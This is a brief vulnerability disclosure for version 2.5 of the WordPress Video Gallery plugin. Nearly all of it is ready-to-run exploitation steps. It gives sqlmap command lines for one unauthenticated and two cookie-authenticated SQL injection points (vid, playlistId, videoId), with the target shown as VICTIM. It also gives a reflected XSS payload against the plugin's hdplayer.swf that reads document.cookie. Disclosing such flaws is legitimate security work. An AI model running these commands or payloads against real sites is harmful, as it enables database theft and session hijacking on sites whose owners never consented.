WordPress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities
Wordpress Video Gallery 2.5 suffers from SQL injection and Cross Site Script vulnerabilities. SQL Injection 1 (Authentication NOT Required): Open the browser and connect to url http://VICTIM/wp-content/plugins/contus-video-gallery/myextractXML.php, copy a video_id number (ex. video_id="1"), and use sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=myextractXML&vid=1" -p vid. SQL Injection 2 (Authentication Required): Use sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newplaylist&playlistId=1" -p playlistId and sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newvideo&videoId=1" -p videoId. XSS Reflected Autentication NOT Required: Open the browser and connect to url http://VICTIM/wp-content/plugins/contus-video-gallery/hdflvplayer/hdplayer.swf, insert the following code in the url ?baserefW=javascript:alert(document.cookie), and the XSS will be triggered.